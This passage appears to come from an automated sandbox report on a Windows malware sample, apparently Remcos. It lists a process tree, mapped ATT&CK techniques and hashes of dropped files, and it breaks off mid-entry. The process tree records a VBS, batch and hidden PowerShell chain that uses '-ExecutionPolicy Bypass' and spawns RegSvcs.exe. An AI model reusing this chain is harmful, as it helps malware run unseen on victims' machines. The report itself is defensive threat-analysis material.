- - C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe
    "C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"
    3⤵
    PID:1292
- C:\Windows\SysWOW64\cmmon32.exe
  "C:\Windows\SysWOW64\cmmon32.exe"
  2⤵
  PID:3832
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  PID:988

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3324

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3876 -ip 3876
1⤵
PID:3704

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2392

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 988 -ip 988
1⤵
PID:3932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd3fbc9758,0x7ffd3fbc9768,0x7ffd3fbc9778
1⤵
PID:1320

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:5804

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
1⤵
PID:3988

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5916

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4424

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
1⤵
PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\micros.bat" "
  2⤵
  PID:1160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\micros.ps1'"
    3⤵
    PID:5116
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:6800
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:1380
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:4868
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:6588

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
1⤵
PID:1420

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:5544

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3760

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
1⤵
PID:6020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\micros.bat" "
  2⤵
  PID:4528
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\micros.ps1'"
    3⤵
    PID:6060

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
1⤵
PID:4540

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
1⤵
PID:4320

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:2740

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
1⤵
PID:1516

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
1⤵
PID:6668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\micros.bat" "
  2⤵
  PID:6084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\micros.ps1'"
    3⤵
    PID:5932

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
1⤵
PID:6344

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:5284

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
1⤵
PID:7072

C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
1⤵
PID:3596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

Software Discovery

T1518

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\presepuesto\LEAJ.exe

Filesize
5.7MB

MD5
a5c6dcf7ef6eac4c0157b5e2f0155424

SHA1
248ad0e9f6f403d172a54abaeaf92df074d617fe

SHA256
6707dfab5d78cad62a28c59519e5809092c5b3d817d39c15a472f0363e88a5fa

SHA512
0e12dc417988ac0358ea7807c4ba1b9894d2679607734b883be5db3cea0e45a537524ac625ab941a377b686f80e92a6623f6bcd06459c848ca04720cc3f7b24c

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
516B

MD5
3f240c7e235d7f66475fe47c19f4484a

SHA1
609afc914a117be621137b08ea779f1000849f2d

SHA256
77354c19a590f2a34e3b3dbdee67a06ac49698eadaf30df5885bfdb460e0a984

SHA512
7603233adce6d74e2db5d86f456461edcf3e1efdcd8dd5200255bf666c4f9625a49c1581423a027a711a1b4e9c6c49c2d930809b91dfdd1547f7d39b85999ded

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
548B

MD5
39838844413fb1443b7d7a076a804319

SHA1
93007b80667c859b17e9b5d12d6cd24f42612541

SHA256
364d7914161830ba2447b21e2d9f45c68434f6b4b3de4ed9f0a94f16955850ae

SHA512
c6d135590dcf0bce781f715daf5a10e2953dda94a4d8f5b7c6bb1f8ff19791cd7aa73c3ac8ab5b1f02975861bc67faadada40932c0dd0c33aa7c3fd3904a750c

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
998B

MD5
57aa9335d04508cdbe73065a3dea716c

SHA1
c211fce7e6645cfd28c644ad004b65af34130c2a

SHA256
77a475a41167728adea9288153b510553a0e7121fdee2a0ddd1f8300d9857a82

SHA512
62d3ccea0a64404eeb06702f6cdc6fd8e22a5b02c2277f528939687fe75d1a99216b29dcb2c7d48bc87c2ff6cb8acf66cd97212e06c9489454ec3d000eb4a303

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
1KB

MD5
1b90fb00ce07a999f63dd4e35bce7a91

SHA1
77fd2f839f8cf63e0d6cd1d67d0aaebcad383683

SHA256
d3ff80aadd76356c846b30d2bed66a94bc1b51428bf6053af0958a368a38c1f8

SHA512
d30e3981c0b218bb8b430167efcd47e1286face810143845ae90275e4349e654115f41eafe728ed9d45bf84622547bd1daa0d358b300546d043b9612b7333383

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
1KB

MD5
270861f193de870f3f0831b1883d46bc

SHA1
c3997a1b98da315cca57091944d231f855b36b93

SHA256
291bdcd5b7eac40ec216d4628dee6fc1da2a6fba210b159a4e213cf63694e93c

SHA512
76953e82d4ca1ec03014f68903f7141cf8cb3888105c5a0ea246e33d51907f92016257fbe6f9d7bd3aa6c5a3f7dfa36da1b83f97dfed0ce5b891423d7dcac47a

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
1KB

MD5
d982aecb2cd47ee52d3b9c5f11349fda

SHA1
fd9ab0899c87003e5a536f4850916e6c976fea68

SHA256
78715dba97385f5b7aa2fbca13ed432d82ccea5dcaec62ceee9482293e5c140b

SHA512
2cce43c2d8565b318aef3eb759e0080f8fb497d72456b799062569427d13c5771c41c881fb99b3e7d647de869d128654a9969fc44b66b67f4f9bd6abe948fe67

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
2KB

MD5
f40450df4cfb72bd2b4b9b952ebb8c8d

SHA1
3b0b8966f0c437119e3bf3b7bf6e28a6dee9ce8b

SHA256
f228055aa20cd6bffe07fed706cbcc4d868f0772aa5394c5d2fcce2bb8c30220

SHA512
bf65a4fddf502dbb581a0523645360cd9c9f24700fc49ac19fca698cc38cdc5f9f13ba35e853a0435e293f25b6ab44ec1c45e002cfe9f9dbe2e88342e4aec4c4

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
2KB

MD5
f94757b0f453a84be0646eff88b83702

SHA1
6886f0dc4df49cf2823c74af01891fa169635c2c

SHA256
224153108f336e8b291896f03cf244a870c08e2a28a62f9820a3dae021bd6618

SHA512
20dd94e2b619f86fc02859608361a4b252ee5a11b28517bd83e42b0d09cf76d00361bcec511b1d6d8ae48a2d172f5ba21d8808afe6af189c2cd7160ac2fb4ae6

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
2KB

MD5
ad99059913b0e8eeb22f1af9e2adbb7c

SHA1
80f29a9c9ea82b18ec0074382278dab467100bab

SHA256
c582ac576e51806c2bd3e3dc3aacbad3041f46c56a15fcb73404bf0d75ff5ed3

SHA512
4c956e518d0118682d4d16f445e4abc4c2981b8f163ea470c10403cd928df210777cd815ad3f668045500b98115087877c688c879e8eb553c056fbeece7edbd6

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
3KB

MD5
4efda76fd4ed39938dcd465f8e6d54e0

SHA1
1cf7a843ec5eda6cd061d0ea85a675c2784b538c

SHA256
38112e8db1238a30c0edb2440397056291b3404c3b869a4be181b5892c3061f6

SHA512
442c07cf92d40aff838842170b64d5132c0e7f94e75c9701ed40d1405310e8e05fd0a69afcae02e8f7ff8917a9a7c9baf6b2bcd50eba97a240eab80ed0d69a42

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
3KB

MD5
db043faab564a75466bdc394d7652057

SHA1
8afcc5f8611d7e46e71aa99bdc3a641e8dd867a0

SHA256
5c5de1fecc0ad84053eb7c2d5cbacc651dfdf265939959489062aa48d5b51029

SHA512
038ce64bc27eeb36c7be6596266dc0a281a3e0919369be02177b99f970051dc3eb896ad00b9f06f37f0b261c9c258e98060b0b060d4fce7f32c2d1ccaa77125c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata

Filesize
114B

MD5
3cadf200903b4b0aff1383a6b1488e01

SHA1
b8a7de9cf097d3614bbdf7fb8341a50718e9f719

SHA256
808fe5d584f5d1cbff7d0934be41525ac7160266a5a5129460f3be26c4e1e8a2

SHA512
044030f57c41d889c9243fd8a62e85b514b0011ab12225013fe3cf9ee61d6a5631990cd78a17059813da208321c89c824ee6675c14a77d195ad355192738f081

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\d8d6f49e-9a73-49a3-9a31-47a458357541.dmp

Filesize
267KB

MD5
ad97ce489da5e87e6fb82f8e12b65ff5

SHA1
eb756dc8b114d25c0ddc4c3fdffd1253770ce49b

SHA256
0f0caaa3d8670633f63afd47b6496742f560c37eb44d22422bce9a58cfa54a0b

SHA512
b7fe85d69fd2175234b341420a72917aeb523f3ee00f34b6b9a719a67fc623ee68791f007dd6f86e82dbab58b61fff24d86a0a7ed5dc8966dd4c98453e87ddce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
8ef4127a7c1e9dc4992f02e479268c14

SHA1
ec97b7e80e6aa7f2d337d312e84732aeb599cd59

SHA256
ce5badf61f761a0997ac2166f8378fe9795187394e39707951d685f756e14192

SHA512
dac70e6acd8c80c1a764dba582195080d3923206ce2de8284a8cf5280f7cc6156f3a748ea1efc37ab287dc332993f53b7f4989c25ca5305a41a4e2eaad8504b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
367e7436ea30b05ad06941e5f9c5e951

SHA1
cb33d28c81917cfeba0aa3bf8e301a24c658f182

SHA256
6fe8f3418490883b6e27985559bb88f8cb6e7e50daab01498d6928d82f102c49

SHA512
8491398ff37ce7c14b39698b463d2f27cd698f281a51919526ede7e4c87af0c0a50c6902a1ae5e64c18d6243dd969cf8d0612f752b233a28e8eb900906545f94

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
1a4f822a5b6684aa54c3116d967abc06

SHA1
798031ae218c9b8e3687adaf83471afd39b18429

SHA256
421f720d9e00e393d100acb8127e4fc2494fc80501f944a6f466dd5745c7d3f6

SHA512
dd098a0eca0b2036b3132135b3f07f6005d38a01d52a7b25d65b5cc7e21a0b3cf5388a8ad111a4f3332cb220b1af7d60fb43bb0219b16426f36768362deb8495

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\b7c624d9d311fdcf61b244bf0defe0d3

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
a761d6e55b338e8cfb6c5651edcfe56d

SHA1
eebbac9ef33ffb4e1df2e4d60d870d26896c196f

SHA256
2939cb5d0fec6759cb1955b6977b5e7077572e3f5080fd829500395eb1e56998

SHA512
719b8e220d219e4280ae172f4d4272afb2be04e80f5b1b91481c52a3ffd9bf37043c598fb4dee0df35228283a6c372f2eeffd1dde0dfed9c3d68855eaa6d7b27

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
8675cf6f5b51c2659ff178e8d5864710

SHA1
a999f96c112a915c01c44075511d5c07190e68df

SHA256
4ccea29d8cc1852ee4d7f6442f2c35480fe89f6fa057477650e6a6af5a1975f5

SHA512
839b0cac067fbb6d01ab5c1ead066227652fbfd2b5ba6eacee309e48e6e20dad26db625adc4a81bb3cc7d2993347bb12cc048c9cff0e61383e353ec38cb11bb3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
5c59c5525143ea3518e9ee116e922d64

SHA1
70e11b9f438f61bde08af34d38fe7a1297cc0130

SHA256
b42381c6d659c060d003b7d73d90cdd4424454285a1f6a74e0dfea912a89be83

SHA512
9573957f7383561cc0f0c63801225c54efb29c148ced9a40d367242a30a7985cbf4919fa3e49b1ff156b52f5b7b6f2fcd0ba8123329bebec261878f0dcf1551b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\bbc43d2f-b84f-43fb-ba4f-42d4194d6537.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
192KB

MD5
c9122f329bbcc9f7403c4003080f712f

SHA1
6aae415a7086ff49722fbe1bfd4d54327e90d8f4

SHA256
c7ea9f1bac05c4d87ed8f07c87ca5a4c285c84c632fc30a86dc44b4812f8ce86

SHA512
6b03f51063cc1efc0cce9b530f1a9d36e640f8a84ebca89fdc3cebc52499ff30aa788d49c4f9d3befc6d5c90b784e2dc0406e27887bfe744fdee2391cff1ba39

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe.log

Filesize
1KB

MD5
baf55b95da4a601229647f25dad12878

SHA1
abc16954ebfd213733c4493fc1910164d825cac8

SHA256
ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

SHA512
24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe.log

Filesize
1KB

MD5
8ec831f3e3a3f77e4a7b9cd32b48384c

SHA1
d83f09fd87c5bd86e045873c231c14836e76a05c

SHA256
7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

SHA512
26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
150B

MD5
6590dd652d15fe353433b1f90f0b36ad

SHA1
df895c7bcb28f6248ed68b3337b85321ff6fb781

SHA256
86ccc4b7919b32b2d5bb4d3a5201def7de41cdb0a77a72de0f70f68d46d34ee4

SHA512
017345e1227f2ec53a999be0ac3fab5165c054d540abe76c4a4e1877d1d8ebe3a804b987a0f366722abe8b40150ad245c21e31c5dab88236703eb1d20f458fa0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
284B

MD5
1a50bb74a6e1c1c90b0746d79237bcb1

SHA1
200dc8e07a8e6f84c07a8bcd8121e420ddbad433

SHA256
6245601e2b0ca4d8c1d1d59cb57468bb304dea5ec82c07f7c13f2f68224e9f0b

SHA512
3e9024b35a70bf5048475b3130cb0ea1cbbbee8bbb1ab2038807a9687cba4ed46145b78d37db5059bf3bc9f3c3687b1656efac378161aa8024d5c843e4bd449d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\204809db-cfde-466b-acbb-c035a009d5da.dmp

Filesize
3.8MB

MD5
aaadb8737b2302da0e30ed890cfcadcb

SHA1
20b4989fd1298a1469a9ffcbb4806b5c3fc21689

SHA256
b2eadcd5a05971f4a07b1eaabeebfe184643fac097b399fae1d18c83439ebed5

SHA512
21a60d4ec6affc911b1bcdba628efa297e82d20abd630c4afcf4ccb3425420f3fb5cb31d86946e991eb4552a491f8a5b08fed86b6aa256b8964b50cdd2ca0f08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\99b98054-249c-4ec3-bbdd-12cf48aa46ea.dmp

Filesize
3.7MB

MD5
afe70c8b8d5ac3453121887a1d90ad2f

SHA1
dcb24672d3fc78b8243246ef2f4086545466dd13

SHA256
7d3ff777c432d1ed5d9186253cbca6b2b3a8bccb5d597c92946da5550f33cea5

SHA512
a660b424e5221e9ae001079088120f094d518affc38e25893b988e97254168ebce7b4b3dbaab8204a4a985d2bff82f0511e912b11ef212395a09851254dc6049

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d8294073f3582e3c0a607a60b6d6ca48

SHA1
3ee881f415563afd0c8265f37eb78235aae909bd

SHA256
31900aacca28ff914c07a077cb9a39ec437ee059958564d718d04ae47426e286

SHA512
8c256228dadfa577cdf938d25ac082a232f1e756cedd587f8e1855c0ff7c09571ebffc8221016ccfdfe0b17d356239685eadd72eaa7c32fe46fcfcdf4aa6cb07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
116dc81b2e155b24b73420560878c311

SHA1
a9b49fabb60645d4775e5de6ee26fb937f7b4c88

SHA256
0ac74fb20e394b10f1a189a8c2669dc21013da282f5eb09e1ba989a085cec245

SHA512
30987a5e32eb76e510f0927dcd35570e84fe59e7c896e2fe0dc928fae1f2b3254cfce9907aa586d862bbb741aee838ee621752c62fc73da920e9c6ffda36eb5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
34bd51a54343a5057e841035b4192a7e

SHA1
e9c282c355ed209131209385b8dcaed48ee7d233

SHA256
442d3ce65135959e73121917e6fedaef9390dd01404e2c29d6284e9ae2d4df7c

SHA512
aa3fcd248cf5f65a81e1a954fa20dd07f48985e7ab58d197217f08aa1c00d78c880531384e69369b161bd94bf1fdbc7e4b710e4bbcf5f51d5ec01dca9d9e09ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aa3a423aca4c074a8225a4136cbd4a64

SHA1
f37423dfcfd1d1377290ed0a5df15ce19e8e1d01

SHA256
df486e89baef5495e7c46593dd0334da54e3d91d3be48de851f4acc66894c71c

SHA512
b70495ecccfa84e9da2833ce62a8ce69a3a29ace97139a39107290bf19f39282652341f55940eec4cf78c2134deb6fcc75fdfc627ee2f41134f8ed3c430b29dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\95bcf356-c160-4dc4-aa78-1143c3ea8bac.tmp

Filesize
7KB

MD5
c61d6b4c36b151379193a358aed10595

SHA1
4a757ababd401eb0c3f466333ec63ac8b2b52a5b

SHA256
08cb90d6855ee02abc0812b5b3c414c1623fea0381bc4be6af1ea13e3179a69f

SHA512
48cfcc3db1f71886227737dace4d4e66fe7810f098efbf9dc705e83ed439beb055de98578d352ee11c8063776934fdb4fe6aa61dd8f30c5fa6d579fdd018c9b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
19KB

MD5
49c675e52f585f989e6a2979cd19d2f2

SHA1
87c889d43c52fc40bc10ed2ecbf201ef32b033df

SHA256
8adeb66a812c61f16c4d81e10137c5cdc65f0f4bb89f94d558e512b847fd8a96

SHA512
3a27b0cd4734b9d266f9f935f7c21db11a4557839a671f7d153cec656399fa9f72ee1e828cfc70fdd1b4e5ff8d82c2b449bfecb7e7db4af7b0e07bf8998ddb8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
63KB

MD5
710d7637cc7e21b62fd3efe6aba1fd27

SHA1
8645d6b137064c7b38e10c736724e17787db6cf3

SHA256
c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

SHA512
19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
67KB

MD5
d8588a7d7bb0b66fb439edf73ee37563

SHA1
a2398d543e3fbeb197e2128654bb5a1afd599585

SHA256
2210c60cbfec62e2bebd2c77783511100072459b3d0cc296216eab8e72d8af35

SHA512
7c87e7b4ec1d643ce2672ef9badefad6832c6fcc4053cedad2d34c52004aed4e0a589e2f839ace7bcdb0f409fff836ca7ce20dc882d9982568176d4b1c830bb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
982KB

MD5
fa645c95565140ec83f575428467aa02

SHA1
a06bf66c489c105c63e2791d5e9f01ee8f8188e6

SHA256
f5e4d2555f39de0f20ad80437796389da3deac8379e2dc9fde6df927cc53f525

SHA512
a728abfc13897cc92ed4761ebf59af9c9b9b45683c963f0265c7767d712151a60b10a11ab2085ff5bb3f8a5b0106dea0e3b5aea63ef5855cca4a39dd211956ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
2KB

MD5
533a23f5a737926ee547857f53ba3e7d

SHA1
26600a689cc7867cf48d06aae799a8b25f6d440c

SHA256
6b458031c661836fd67f3f7a8c62f9c8824a754f86d84219cefb68bff90e2bcb

SHA512
6a95798e87e707834816ab59583bec194c604e61a0fc3d510f395ba7fe57e45917e8219d655c3058651c626018b333d607e592d1574e60984568a0afe4339b87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
c13cfb0125befd36bd28cd30c988398b

SHA1
